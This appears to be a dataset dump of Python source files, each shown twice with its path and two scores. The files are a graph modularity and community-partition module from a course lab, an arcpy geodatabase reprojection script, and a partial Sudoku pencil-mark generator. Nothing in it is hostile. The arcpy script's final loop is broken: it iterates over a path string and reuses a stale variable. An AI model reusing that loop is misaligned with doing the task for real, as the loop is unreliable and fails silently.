np.savetxt('sma_OP.out', steps_sma_OP_distance)
open_trajectory(nprocs, rank, first_frame, last_frame) | 0.788909 | 0.468851 |
import copy
class WeightedUndirectedGraph(object):
'''
An object that records a weighted undirected graph
Members
-------
WeightedUndirectedGraph._graph: dict of dict, the graph;
WeightedUndirectedGraph._degree: the precomputed weighted degree of each node in the graph;
WeightedUndirectedGraph._node_weight: the weight of the each node in the graph;
WeightedUndirectedGraph._node_size: the node size of the graph;
WeightedUndirectedGraph._edge_degree: the precomputed degree of each node in the graph;
WeightedUndirectedGraph._size: the weighted edge size of the graph;
WeightedUndirectedGraph._edge_size: the edge size of the graph.
'''
def __init__(self):
'''
Initialize the graph as an empty graph.
'''
self._graph = {}
self._degree = {}
self._node_weight = {}
self._node_size = 0
self._edge_degree = {}
self._size = 0
self._edge_size = 0
def add_node(self, node, node_weight = 1):
'''
Add a node in the graph
Parameters
----------
node: the given index of the node
node_weight: int, optional, default: 1, the weight of the node
'''
if node in self._graph.keys():
return
self._graph[node] = {}
self._node_weight[node] = node_weight
self._degree[node] = 0
self._edge_degree[node] = 0
self._node_size += 1
def add_edge(self, source, target, weight = 1):
'''
Add an (weighted) undirected edge in the graph, note that multiple edges are combined into one.
Parameters
----------
source: the source node of the edge, if the node does not exist in the graph, then create a new node;
target: the target node of the edge, if the node does not exist in the graph, then create a new node;
weight: int, optional, default: 1, the weight of the edge.
'''
self.add_node(source)
self.add_node(target)
self._graph[source][target] = self._graph[source].get(target, 0) + weight
if source != target:
self._graph[target][source] = self._graph[target].get(source, 0) + weight
self._degree[source] += weight
self._degree[target] += weight
self._size += weight
self._edge_size += 1
self._edge_degree[source] += 1
self._edge_degree[target] += 1
def add_edges_from_list(self, edge_list):
'''
Add edges from edge list.
Parameters
----------
edge_list: the given edge list, which should follow the following format:
[e1, e2, ..., en] where ei = [source_i, target_i, (weight_i)]
'''
for edge in edge_list:
assert len(edge) == 2 or len(edge) == 3
if len(edge) == 2:
self.add_edge(edge[0], edge[1])
else:
self.add_edge(edge[0], edge[1], edge[2])
def iter_nodes(self):
'''
Get an iterative dict of all nodes in the graph, which is used to enumerate nodes.
Returns
-------
An iterative dict of all nodes.
Usage
-----
graph = WeightedUndirectedGraph()
graph.add_edge(2, 3)
graph.add_edge(1, 4)
for node in graph.iter_nodes():
print(node)
'''
return self._graph
def iter_edges(self, node):
'''
Get an iterative dict of all edges in the graph linking the given node, which is used to enumerate edges.
Parameters
----------
node: the target node.
Returns
-------
An iterative dict of all edges.
Usage
-----
graph = WeightedUndirectedGraph()
graph.add_edge(2, 3)
graph.add_edge(2, 4)
for target_node, weight in graph.iter_edges(2).items():
print(target_node, weight)
'''
return self._graph[node]
def degree(self, node):
'''
Get the weighted degree of the given node in the graph.
Parameters
----------
node: the target node.
Returns
-------
The weighted degree of the node.
'''
return self._degree.get(node, 0)
def edge_degree(self, node):
'''
Get the unweighted degree of the given node in the graph, i.e., the number of edges that link the node.
Parameters
----------
node: the target node.
Returns
-------
The unweighted degree of the node.
'''
return self._edge_degree.get(node, 0)
def node_weight(self, node):
'''
Get the weight of the given node in the graph.
Parameters
----------
node: the target node.
Returns
-------
The node weight.
'''
return self._node_weight[node]
def size(self):
'''
Get the weighted size of the graph, i.e., the sum of edge weights.
Returns
-------
The sum of edge weights in the graph.
'''
return self._size
def node_size(self):
'''
Get the node size of the graph
Returns
-------
The node size of the graph.
'''
return self._node_size
def edge_size(self):
'''
Get the unweighted size of the graph, i.e., the number of the edges.
Returns
-------
The number of the edges in the graph.
'''
return self._edge_size
def get_selfcycle(self, node):
'''
Get the weight of self-cycle node-node.
Parameters
----------
node: int, the start node and end node of the self-cycle.
Returns
-------
The weight of the self-cycle started and ended at node
'''
return self._graph[node].get(node, 0)
def copy(self):
'''
Copy the current object.
Returns
-------
A copied object.
'''
return copy.deepcopy(self)
class GraphPartition(object):
'''
An object that records the partition of a given graph
Members
-------
GraphPartition.graph: networkx.Graph object, the given graph;
GraphPartition.resolution: float, optional, default: 1.0, the resolution of modularity;
GraphPartition.m2: int, the total degree of the graph;
GraphPartition.partition: dict, the partition of the graph;
GraphPartition.nodes: list of list, the nodes contained in each community;
GraphPartition.nodes_weight: list, the summation of node weights in each community;
GraphPartition.degree: list, the degree of nodes in each community, used for modularity calculation;
GraphPartition.inside_weight: list, the inside edge weight in each community, used for modularity calculation;
GraphPartition.cluster_size: list, the size of each cluster partitioned in the graph;
GraphPartition.num_clusters: int, the number of clusters in the partition.
'''
def __init__(self, graph, resolution = 1.0, initialize_singleton = True):
'''
Initialize the partition as an individual partition.
Parameters
----------
graph: a WeightedUndirectedGraph object, the graph we focus on;
resolution: float, optional, default: 1.0, the resolution of modularity;
initialize_singleton: bool, optional, defualt: True, whether to initialize the object as a singleton partition of the graph.
'''
super(GraphPartition, self).__init__()
self.graph = graph.copy()
self.resolution = resolution
self.m2 = 2 * self.graph.size()
self.partition = {}
self.nodes = []
self.nodes_weight = []
self.degree = []
self.inside_weight = []
self.cluster_size = []
self.num_clusters = 0
if initialize_singleton:
for x in graph.iter_nodes():
self.partition[x] = self.num_clusters
self.nodes.append([x])
self.nodes_weight.append(self.graph.node_weight(x))
self.degree.append(graph.degree(x))
self.inside_weight.append(self.graph.get_selfcycle(x) * 2)
self.cluster_size.append(1)
self.num_clusters += 1
def get_community(self, x):
'''
Get the community of x in the given partition.
Parameters
----------
x: int, a given node in the graph.
Returns
-------
the communities that node x lies in; if no communities is found, then return -1.
'''
return self.partition.get(x, -1)
def assign_community(self, x, com):
'''
Assign the community of the node.
Parameters
----------
x: int, a given node in the graph;
com: int, the assigned community to the given node.
'''
if self.partition[x] == com:
return
if com >= self.num_clusters:
raise ValueError('community number is not valid!')
# Remove from old community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
old_com = self.partition[x]
self.nodes[old_com].remove(x)
self.degree[old_com] -= self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == old_com:
self.inside_weight[old_com] -= w + w
self.cluster_size[old_com] -= 1
self.nodes_weight[old_com] -= self.graph.node_weight(x)
# Add into new community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
self.partition[x] = com
self.nodes[com].append(x)
self.degree[com] += self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == com:
self.inside_weight[com] += w + w
self.cluster_size[com] += 1
self.nodes_weight[com] += self.graph.node_weight(x)
def insert_community(self, num = 1):
'''
Insert new empty communities.
Parameters
----------
num: int, optional, default: 1, the number of communities you want to insert.
'''
if type(num) is not int or num < 0:
raise ValueError('num should be non-negative integers.')
for _ in range(num):
self.nodes.append([])
self.nodes_weight.append(0)
self.degree.append(0)
self.inside_weight.append(0)
self.cluster_size.append(0)
self.num_clusters += 1
def iter_communities(self):
'''
Get an iterative list of the communities in the partition, which is used to enumerate communities.
Returns
-------
An iterative list of the communities in the partition.
'''
res = []
for i in range(self.num_clusters):
if self.cluster_size[i] > 0:
res.append(i)
return res
def get_partition(self):
'''
Get the partition dict of the graph.
Returns
-------
A partition dict.
'''
return self.partition
def get_community_size(self, com):
'''
Get the size of the community.
Parameters
----------
com: int, the community.
Returns
-------
The size of the community, 0 if the community not exists.
'''
return self.cluster_size[com] if com < self.num_clusters else 0
def get_community_members(self, com):
'''
Get the members of the community.
Parameters
----------
com: int, the community.
Returns
-------
The members of the community.
'''
return self.nodes[com] if com < self.num_clusters else []
def get_community_nodes_weight(self, com):
'''
Get the weights of all nodes of the community.
Parameters
----------
com: int, the community.
Returns
-------
The weight of all nodes of the community.
'''
return self.nodes_weight[com] if com < self.num_clusters else 0
def is_singleton(self):
'''
Check whether the partition is a singleton partition.
Returns
-------
True if the partition is a singleton partition, False otherwise.
'''
for i in range(self.num_clusters):
if self.cluster_size[i] != 1:
return False
return True
def get_degree(self, com):
'''
Get the degree of the community.
Parameters
----------
com: int, the community.
Returns
-------
The degree of the community.
'''
return self.degree[com] if com < self.num_clusters else 0
def renumber(self):
'''
Renumber the partitions.
Returns
-------
The renumbered partition.
'''
res = GraphPartition(self.graph, self.resolution, initialize_singleton=False)
renumber_mapping = {}
for com in self.iter_communities():
new_com = res.num_clusters
renumber_mapping[com] = new_com
res.nodes.append(self.nodes[com].copy())
res.nodes_weight.append(self.nodes_weight[com])
res.degree.append(self.degree[com])
res.inside_weight.append(self.inside_weight[com])
res.cluster_size.append(self.cluster_size[com])
res.num_clusters += 1
for x in self.graph.iter_nodes().keys():
res.partition[x] = renumber_mapping[self.partition[x]]
return res
def modularity(self, optimized = True):
'''
Compute the modularity of the current partition in the graph.
Parameters
----------
optimized: bool, optional, default: True, whether use the precomputed value to optimize the modularity calculation.
Returns
-------
The modularity value Q of graph on the current partition.
'''
if optimized:
Q = 0
for community in self.iter_communities():
Q += self.inside_weight[community] / self.m2 - self.resolution * (self.degree[community] / self.m2) ** 2
return Q
else:
return modularity(self.graph, self, self.resolution)
def modularity_gain(self, x, com):
'''
Calculate the modularity gain if we assign com to the community of x.
Parameters
----------
x: int, a given node in the graph;
com: int, the assigned community to the node x.
Returns
-------
dQ, the modularity gain.
'''
old_com = self.partition[x]
dQ = (self.degree[com] / self.m2) ** 2 + (self.degree[old_com] / self.m2) ** 2
dQ -= ((self.degree[com] + self.graph.degree(x)) / self.m2) ** 2 + ((self.degree[old_com] - self.graph.degree(x)) / self.m2) ** 2
dQ = dQ * self.resolution
for y, w in self.graph.iter_edges(x).items():
if x == y:
continue
if self.partition[y] == com:
dQ += (w + w) / self.m2
elif self.partition[y] == old_com:
dQ -= (w + w) / self.m2
return dQ
def copy(self):
'''
Copy the current object.
Returns
-------
A copied object.
'''
return copy.deepcopy(self)
def modularity(graph, partition, resolution = 1.0):
'''
Compute the modularity of the partition in the graph
Parameters
----------
graph: a WeightedUndirectedGraph object, the graph which will be decomposed;
partition: a GraphPartition object, the partition of the given graph;
resolution: float, optional, default: 1.0, the resolution of the modularity.
Returns
-------
The modularity value of graph G on partition S, i.e., Q(G, S).
'''
assert type(graph) is WeightedUndirectedGraph
assert type(partition) is GraphPartition
m = graph.size()
if m == 0:
raise AttributeError('There should be at least one edge in the graph, otherwise the modularity value is undefined.')
degree = {}
inside_weight = {}
for x in graph.iter_nodes():
community = partition.get_community(x)
degree[community] = degree.get(community, 0) + graph.degree(x)
for y, w in graph.iter_edges(x).items():
if partition.get_community(y) == community:
inside_weight[community] = inside_weight.get(community, 0) + w
if x == y: # self-cycle
inside_weight[community] = inside_weight.get(community, 0) + w
Q = 0 # The modularity value
for community in partition.iter_communities():
Q = Q + inside_weight.get(community, 0) / (2 * m) - resolution * (degree.get(community, 0) / (2 * m)) ** 2
return Q | Labs/Lab3/community/graphx.py | import copy
class WeightedUndirectedGraph(object):
'''
An object that records a weighted undirected graph
Members
-------
WeightedUndirectedGraph._graph: dict of dict, the graph;
WeightedUndirectedGraph._degree: the precomputed weighted degree of each node in the graph;
WeightedUndirectedGraph._node_weight: the weight of the each node in the graph;
WeightedUndirectedGraph._node_size: the node size of the graph;
WeightedUndirectedGraph._edge_degree: the precomputed degree of each node in the graph;
WeightedUndirectedGraph._size: the weighted edge size of the graph;
WeightedUndirectedGraph._edge_size: the edge size of the graph.
'''
def __init__(self):
'''
Initialize the graph as an empty graph.
'''
self._graph = {}
self._degree = {}
self._node_weight = {}
self._node_size = 0
self._edge_degree = {}
self._size = 0
self._edge_size = 0
def add_node(self, node, node_weight = 1):
'''
Add a node in the graph
Parameters
----------
node: the given index of the node
node_weight: int, optional, default: 1, the weight of the node
'''
if node in self._graph.keys():
return
self._graph[node] = {}
self._node_weight[node] = node_weight
self._degree[node] = 0
self._edge_degree[node] = 0
self._node_size += 1
def add_edge(self, source, target, weight = 1):
'''
Add an (weighted) undirected edge in the graph, note that multiple edges are combined into one.
Parameters
----------
source: the source node of the edge, if the node does not exist in the graph, then create a new node;
target: the target node of the edge, if the node does not exist in the graph, then create a new node;
weight: int, optional, default: 1, the weight of the edge.
'''
self.add_node(source)
self.add_node(target)
self._graph[source][target] = self._graph[source].get(target, 0) + weight
if source != target:
self._graph[target][source] = self._graph[target].get(source, 0) + weight
self._degree[source] += weight
self._degree[target] += weight
self._size += weight
self._edge_size += 1
self._edge_degree[source] += 1
self._edge_degree[target] += 1
def add_edges_from_list(self, edge_list):
'''
Add edges from edge list.
Parameters
----------
edge_list: the given edge list, which should follow the following format:
[e1, e2, ..., en] where ei = [source_i, target_i, (weight_i)]
'''
for edge in edge_list:
assert len(edge) == 2 or len(edge) == 3
if len(edge) == 2:
self.add_edge(edge[0], edge[1])
else:
self.add_edge(edge[0], edge[1], edge[2])
def iter_nodes(self):
'''
Get an iterative dict of all nodes in the graph, which is used to enumerate nodes.
Returns
-------
An iterative dict of all nodes.
Usage
-----
graph = WeightedUndirectedGraph()
graph.add_edge(2, 3)
graph.add_edge(1, 4)
for node in graph.iter_nodes():
print(node)
'''
return self._graph
def iter_edges(self, node):
'''
Get an iterative dict of all edges in the graph linking the given node, which is used to enumerate edges.
Parameters
----------
node: the target node.
Returns
-------
An iterative dict of all edges.
Usage
-----
graph = WeightedUndirectedGraph()
graph.add_edge(2, 3)
graph.add_edge(2, 4)
for target_node, weight in graph.iter_edges(2).items():
print(target_node, weight)
'''
return self._graph[node]
def degree(self, node):
'''
Get the weighted degree of the given node in the graph.
Parameters
----------
node: the target node.
Returns
-------
The weighted degree of the node.
'''
return self._degree.get(node, 0)
def edge_degree(self, node):
'''
Get the unweighted degree of the given node in the graph, i.e., the number of edges that link the node.
Parameters
----------
node: the target node.
Returns
-------
The unweighted degree of the node.
'''
return self._edge_degree.get(node, 0)
def node_weight(self, node):
'''
Get the weight of the given node in the graph.
Parameters
----------
node: the target node.
Returns
-------
The node weight.
'''
return self._node_weight[node]
def size(self):
'''
Get the weighted size of the graph, i.e., the sum of edge weights.
Returns
-------
The sum of edge weights in the graph.
'''
return self._size
def node_size(self):
'''
Get the node size of the graph
Returns
-------
The node size of the graph.
'''
return self._node_size
def edge_size(self):
'''
Get the unweighted size of the graph, i.e., the number of the edges.
Returns
-------
The number of the edges in the graph.
'''
return self._edge_size
def get_selfcycle(self, node):
'''
Get the weight of self-cycle node-node.
Parameters
----------
node: int, the start node and end node of the self-cycle.
Returns
-------
The weight of the self-cycle started and ended at node
'''
return self._graph[node].get(node, 0)
def copy(self):
'''
Copy the current object.
Returns
-------
A copied object.
'''
return copy.deepcopy(self)
class GraphPartition(object):
'''
An object that records the partition of a given graph
Members
-------
GraphPartition.graph: networkx.Graph object, the given graph;
GraphPartition.resolution: float, optional, default: 1.0, the resolution of modularity;
GraphPartition.m2: int, the total degree of the graph;
GraphPartition.partition: dict, the partition of the graph;
GraphPartition.nodes: list of list, the nodes contained in each community;
GraphPartition.nodes_weight: list, the summation of node weights in each community;
GraphPartition.degree: list, the degree of nodes in each community, used for modularity calculation;
GraphPartition.inside_weight: list, the inside edge weight in each community, used for modularity calculation;
GraphPartition.cluster_size: list, the size of each cluster partitioned in the graph;
GraphPartition.num_clusters: int, the number of clusters in the partition.
'''
def __init__(self, graph, resolution = 1.0, initialize_singleton = True):
'''
Initialize the partition as an individual partition.
Parameters
----------
graph: a WeightedUndirectedGraph object, the graph we focus on;
resolution: float, optional, default: 1.0, the resolution of modularity;
initialize_singleton: bool, optional, defualt: True, whether to initialize the object as a singleton partition of the graph.
'''
super(GraphPartition, self).__init__()
self.graph = graph.copy()
self.resolution = resolution
self.m2 = 2 * self.graph.size()
self.partition = {}
self.nodes = []
self.nodes_weight = []
self.degree = []
self.inside_weight = []
self.cluster_size = []
self.num_clusters = 0
if initialize_singleton:
for x in graph.iter_nodes():
self.partition[x] = self.num_clusters
self.nodes.append([x])
self.nodes_weight.append(self.graph.node_weight(x))
self.degree.append(graph.degree(x))
self.inside_weight.append(self.graph.get_selfcycle(x) * 2)
self.cluster_size.append(1)
self.num_clusters += 1
def get_community(self, x):
'''
Get the community of x in the given partition.
Parameters
----------
x: int, a given node in the graph.
Returns
-------
the communities that node x lies in; if no communities is found, then return -1.
'''
return self.partition.get(x, -1)
def assign_community(self, x, com):
'''
Assign the community of the node.
Parameters
----------
x: int, a given node in the graph;
com: int, the assigned community to the given node.
'''
if self.partition[x] == com:
return
if com >= self.num_clusters:
raise ValueError('community number is not valid!')
# Remove from old community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
old_com = self.partition[x]
self.nodes[old_com].remove(x)
self.degree[old_com] -= self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == old_com:
self.inside_weight[old_com] -= w + w
self.cluster_size[old_com] -= 1
self.nodes_weight[old_com] -= self.graph.node_weight(x)
# Add into new community, maintain self.nodes, self.degree, self.inside_weight, self.cluster_size
self.partition[x] = com
self.nodes[com].append(x)
self.degree[com] += self.graph.degree(x)
for y, w in self.graph.iter_edges(x).items():
if self.partition[y] == com:
self.inside_weight[com] += w + w
self.cluster_size[com] += 1
self.nodes_weight[com] += self.graph.node_weight(x)
def insert_community(self, num = 1):
'''
Insert new empty communities.
Parameters
----------
num: int, optional, default: 1, the number of communities you want to insert.
'''
if type(num) is not int or num < 0:
raise ValueError('num should be non-negative integers.')
for _ in range(num):
self.nodes.append([])
self.nodes_weight.append(0)
self.degree.append(0)
self.inside_weight.append(0)
self.cluster_size.append(0)
self.num_clusters += 1
def iter_communities(self):
'''
Get an iterative list of the communities in the partition, which is used to enumerate communities.
Returns
-------
An iterative list of the communities in the partition.
'''
res = []
for i in range(self.num_clusters):
if self.cluster_size[i] > 0:
res.append(i)
return res
def get_partition(self):
'''
Get the partition dict of the graph.
Returns
-------
A partition dict.
'''
return self.partition
def get_community_size(self, com):
'''
Get the size of the community.
Parameters
----------
com: int, the community.
Returns
-------
The size of the community, 0 if the community not exists.
'''
return self.cluster_size[com] if com < self.num_clusters else 0
def get_community_members(self, com):
'''
Get the members of the community.
Parameters
----------
com: int, the community.
Returns
-------
The members of the community.
'''
return self.nodes[com] if com < self.num_clusters else []
def get_community_nodes_weight(self, com):
'''
Get the weights of all nodes of the community.
Parameters
----------
com: int, the community.
Returns
-------
The weight of all nodes of the community.
'''
return self.nodes_weight[com] if com < self.num_clusters else 0
def is_singleton(self):
'''
Check whether the partition is a singleton partition.
Returns
-------
True if the partition is a singleton partition, False otherwise.
'''
for i in range(self.num_clusters):
if self.cluster_size[i] != 1:
return False
return True
def get_degree(self, com):
'''
Get the degree of the community.
Parameters
----------
com: int, the community.
Returns
-------
The degree of the community.
'''
return self.degree[com] if com < self.num_clusters else 0
def renumber(self):
'''
Renumber the partitions.
Returns
-------
The renumbered partition.
'''
res = GraphPartition(self.graph, self.resolution, initialize_singleton=False)
renumber_mapping = {}
for com in self.iter_communities():
new_com = res.num_clusters
renumber_mapping[com] = new_com
res.nodes.append(self.nodes[com].copy())
res.nodes_weight.append(self.nodes_weight[com])
res.degree.append(self.degree[com])
res.inside_weight.append(self.inside_weight[com])
res.cluster_size.append(self.cluster_size[com])
res.num_clusters += 1
for x in self.graph.iter_nodes().keys():
res.partition[x] = renumber_mapping[self.partition[x]]
return res
def modularity(self, optimized = True):
'''
Compute the modularity of the current partition in the graph.
Parameters
----------
optimized: bool, optional, default: True, whether use the precomputed value to optimize the modularity calculation.
Returns
-------
The modularity value Q of graph on the current partition.
'''
if optimized:
Q = 0
for community in self.iter_communities():
Q += self.inside_weight[community] / self.m2 - self.resolution * (self.degree[community] / self.m2) ** 2
return Q
else:
return modularity(self.graph, self, self.resolution)
def modularity_gain(self, x, com):
'''
Calculate the modularity gain if we assign com to the community of x.
Parameters
----------
x: int, a given node in the graph;
com: int, the assigned community to the node x.
Returns
-------
dQ, the modularity gain.
'''
old_com = self.partition[x]
dQ = (self.degree[com] / self.m2) ** 2 + (self.degree[old_com] / self.m2) ** 2
dQ -= ((self.degree[com] + self.graph.degree(x)) / self.m2) ** 2 + ((self.degree[old_com] - self.graph.degree(x)) / self.m2) ** 2
dQ = dQ * self.resolution
for y, w in self.graph.iter_edges(x).items():
if x == y:
continue
if self.partition[y] == com:
dQ += (w + w) / self.m2
elif self.partition[y] == old_com:
dQ -= (w + w) / self.m2
return dQ
def copy(self):
'''
Copy the current object.
Returns
-------
A copied object.
'''
return copy.deepcopy(self)
def modularity(graph, partition, resolution = 1.0):
'''
Compute the modularity of the partition in the graph
Parameters
----------
graph: a WeightedUndirectedGraph object, the graph which will be decomposed;
partition: a GraphPartition object, the partition of the given graph;
resolution: float, optional, default: 1.0, the resolution of the modularity.
Returns
-------
The modularity value of graph G on partition S, i.e., Q(G, S).
'''
assert type(graph) is WeightedUndirectedGraph
assert type(partition) is GraphPartition
m = graph.size()
if m == 0:
raise AttributeError('There should be at least one edge in the graph, otherwise the modularity value is undefined.')
degree = {}
inside_weight = {}
for x in graph.iter_nodes():
community = partition.get_community(x)
degree[community] = degree.get(community, 0) + graph.degree(x)
for y, w in graph.iter_edges(x).items():
if partition.get_community(y) == community:
inside_weight[community] = inside_weight.get(community, 0) + w
if x == y: # self-cycle
inside_weight[community] = inside_weight.get(community, 0) + w
Q = 0 # The modularity value
for community in partition.iter_communities():
Q = Q + inside_weight.get(community, 0) / (2 * m) - resolution * (degree.get(community, 0) / (2 * m)) ** 2
return Q | 0.931711 | 0.703906 |
import arcpy
import sys
from os.path import join
arcpy.env.geographicTransformations = 'NAD_1983_to_WGS_1984_5'
try:
base_folder = sys.argv[1]
except:
base_folder = raw_input('base folder: ')
print('creating new database')
new_db = base_folder + 'QueryLayers_NEW.gdb'
old_db = base_folder + 'QueryLayers.gdb'
new_ref_db = base_folder + 'ReferenceData_NEW.gdb'
old_ref_db = base_folder + 'ReferenceData.gdb'
if arcpy.Exists(new_db):
arcpy.Delete_management(new_db)
arcpy.CreateFileGDB_management(base_folder, 'QueryLayers_NEW.gdb')
if arcpy.Exists(new_ref_db):
arcpy.Delete_management(new_ref_db)
arcpy.CreateFileGDB_management(base_folder, 'ReferenceData_NEW.gdb')
relationship_class_names = set([])
arcpy.env.workspace = old_db
print('FEATURE CLASSES')
for fc in arcpy.ListFeatureClasses():
print(fc)
arcpy.Project_management(fc, join(new_db, fc), arcpy.SpatialReference(3857))
relationship_class_names.update(arcpy.Describe(fc).relationshipClassNames)
print('TABLES')
for tbl in arcpy.ListTables():
print(tbl)
arcpy.CopyRows_management(tbl, join(new_db, tbl))
relationship_class_names.update(arcpy.Describe(tbl).relationshipClassNames)
print('RELATIONSHIP CLASSES')
card_lu = {'OneToOne': 'ONE_TO_ONE',
'OneToMany': 'ONE_TO_MANY',
'ManyToMany': 'MANY_TO_MANY'}
arcpy.env.workspace = new_db
for rc in relationship_class_names:
print(rc)
rc_desc = arcpy.Describe(join(old_db, rc))
keys = {}
for k in rc_desc.originClassKeys:
keys[k[1]] = k[0]
if len(rc_desc.destinationClassKeys) > 0:
print('DESTINATION KEYS!!!')
arcpy.CreateRelationshipClass_management(join(new_db, rc_desc.originClassNames[0]),
join(new_db, rc_desc.destinationClassNames[0]),
rc,
'SIMPLE',
rc_desc.forwardPathLabel,
rc_desc.backwardPathLabel,
rc_desc.notification.upper(),
card_lu[rc_desc.cardinality],
'NONE',
keys['OriginPrimary'],
keys['OriginForeign'])
print('REFERENCE DATA')
arcpy.env.workspace = old_ref_db
for r in new_ref_db:
print(r)
arcpy.Project_management(r, join(new_ref_db, fc), arcpy.SpatialReference(3857))
print('done') | scripts/reprojectDB.py | import arcpy
import sys
from os.path import join
arcpy.env.geographicTransformations = 'NAD_1983_to_WGS_1984_5'
try:
base_folder = sys.argv[1]
except:
base_folder = raw_input('base folder: ')
print('creating new database')
new_db = base_folder + 'QueryLayers_NEW.gdb'
old_db = base_folder + 'QueryLayers.gdb'
new_ref_db = base_folder + 'ReferenceData_NEW.gdb'
old_ref_db = base_folder + 'ReferenceData.gdb'
if arcpy.Exists(new_db):
arcpy.Delete_management(new_db)
arcpy.CreateFileGDB_management(base_folder, 'QueryLayers_NEW.gdb')
if arcpy.Exists(new_ref_db):
arcpy.Delete_management(new_ref_db)
arcpy.CreateFileGDB_management(base_folder, 'ReferenceData_NEW.gdb')
relationship_class_names = set([])
arcpy.env.workspace = old_db
print('FEATURE CLASSES')
for fc in arcpy.ListFeatureClasses():
print(fc)
arcpy.Project_management(fc, join(new_db, fc), arcpy.SpatialReference(3857))
relationship_class_names.update(arcpy.Describe(fc).relationshipClassNames)
print('TABLES')
for tbl in arcpy.ListTables():
print(tbl)
arcpy.CopyRows_management(tbl, join(new_db, tbl))
relationship_class_names.update(arcpy.Describe(tbl).relationshipClassNames)
print('RELATIONSHIP CLASSES')
card_lu = {'OneToOne': 'ONE_TO_ONE',
'OneToMany': 'ONE_TO_MANY',
'ManyToMany': 'MANY_TO_MANY'}
arcpy.env.workspace = new_db
for rc in relationship_class_names:
print(rc)
rc_desc = arcpy.Describe(join(old_db, rc))
keys = {}
for k in rc_desc.originClassKeys:
keys[k[1]] = k[0]
if len(rc_desc.destinationClassKeys) > 0:
print('DESTINATION KEYS!!!')
arcpy.CreateRelationshipClass_management(join(new_db, rc_desc.originClassNames[0]),
join(new_db, rc_desc.destinationClassNames[0]),
rc,
'SIMPLE',
rc_desc.forwardPathLabel,
rc_desc.backwardPathLabel,
rc_desc.notification.upper(),
card_lu[rc_desc.cardinality],
'NONE',
keys['OriginPrimary'],
keys['OriginForeign'])
print('REFERENCE DATA')
arcpy.env.workspace = old_ref_db
for r in new_ref_db:
print(r)
arcpy.Project_management(r, join(new_ref_db, fc), arcpy.SpatialReference(3857))
print('done') | 0.155046 | 0.082438 |
example_grid = [
[5,0,0,0,0,7,0,0,0]
,[9,2,6,5,0,0,0,0,0]
,[3,0,0,8,0,9,0,2,0]
,[4,0,0,0,2,0,0,3,5]
,[0,3,5,1,0,4,9,7,0]
,[8,6,0,0,5,0,0,0,4]
,[0,4,0,3,0,8,0,0,2]
,[0,0,0,0,0,5,6,9,3]
,[0,0,0,6,0,0,0,0,7]]
def print_grid(grid):
for row in grid:
print(row)
def get_indices_of_empty_cells(grid):
return [(i,j) for i in range(0,9) for j in range(0,9) if grid[i][j] == 0]
def get_rows_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[indices[i][0]][j] for j in range(0,9)] for i in range(0, len(indices))]
def get_columns_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[i][indices[j][1]] for i in range(0,9)] for j in range(0, len(indices))]
def get_indices_of_boxes():
return [[(i + x, j + y) for i in range(3) for j in range(3)] for x in [0,3,6] for y in [0,3,6]]
def get_boxes_with_empty_cells(grid):
indices_of_boxes = get_indices_of_boxes()
indices_of_empty_cells = get_indices_of_empty_cells(grid)
indices_of_boxes_for_each_empty_cells = [indices_of_boxes[i]
for x in indices_of_empty_cells
for i in range(len(indices_of_boxes))
for y in indices_of_boxes[i] if x == y]
return [[grid[i][j] for (i,j) in x] for x in indices_of_boxes_for_each_empty_cells]
def get_clues_of_groups(grid):
rows = get_rows_with_empty_cells(grid)
columns = get_columns_with_empty_cells(grid)
boxes = get_boxes_with_empty_cells(grid)
return [[[x[i] for i in range(len(x)) if x[i] != 0] for x in [row, column, box]] for (row, column, box) in zip(rows, columns, boxes)]
def generate_pencil_marks(grid):
clues = get_clues_of_groups(grid)
all_clues = [set([y for i in range(len(x)) for y in x[i]]) for x in clues]
pencil_marks = [set(set({1, 2, 3, 4, 5, 6, 7, 8, 9}) - set(x)) for x in all_clues]
return pencil_marks
def get_indices_and_candidates(grid):
indices = get_indices_of_empty_cells(grid)
pencil_marks = generate_pencil_marks(grid)
return [(tuple_of_indices, candidate) for tuple_of_indices, candidate in zip(indices, pencil_marks)]
def insert_pencil_marks(grid):
indices_and_candidates = get_indices_and_candidates(grid)
for i in range(len(indices_and_candidates)):
grid[indices_and_candidates[i][0][0]][indices_and_candidates[i][0][1]] = indices_and_candidates[i][1]
return grid
print(insert_pencil_marks(example_grid)) | sudoku/solver/pencil_marks.py | example_grid = [
[5,0,0,0,0,7,0,0,0]
,[9,2,6,5,0,0,0,0,0]
,[3,0,0,8,0,9,0,2,0]
,[4,0,0,0,2,0,0,3,5]
,[0,3,5,1,0,4,9,7,0]
,[8,6,0,0,5,0,0,0,4]
,[0,4,0,3,0,8,0,0,2]
,[0,0,0,0,0,5,6,9,3]
,[0,0,0,6,0,0,0,0,7]]
def print_grid(grid):
for row in grid:
print(row)
def get_indices_of_empty_cells(grid):
return [(i,j) for i in range(0,9) for j in range(0,9) if grid[i][j] == 0]
def get_rows_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[indices[i][0]][j] for j in range(0,9)] for i in range(0, len(indices))]
def get_columns_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[i][indices[j][1]] for i in range(0,9)] for j in range(0, len(indices))]
def get_indices_of_boxes():
return [[(i + x, j + y) for i in range(3) for j in range(3)] for x in [0,3,6] for y in [0,3,6]]
def get_boxes_with_empty_cells(grid):
indices_of_boxes = get_indices_of_boxes()
indices_of_empty_cells = get_indices_of_empty_cells(grid)
indices_of_boxes_for_each_empty_cells = [indices_of_boxes[i]
for x in indices_of_empty_cells
for i in range(len(indices_of_boxes))
for y in indices_of_boxes[i] if x == y]
return [[grid[i][j] for (i,j) in x] for x in indices_of_boxes_for_each_empty_cells]
def get_clues_of_groups(grid):
rows = get_rows_with_empty_cells(grid)
columns = get_columns_with_empty_cells(grid)
boxes = get_boxes_with_empty_cells(grid)
return [[[x[i] for i in range(len(x)) if x[i] != 0] for x in [row, column, box]] for (row, column, box) in zip(rows, columns, boxes)]
def generate_pencil_marks(grid):
clues = get_clues_of_groups(grid)
all_clues = [set([y for i in range(len(x)) for y in x[i]]) for x in clues]
